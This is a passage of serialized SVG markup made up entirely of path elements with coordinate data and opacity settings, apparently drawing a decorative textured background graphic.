d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 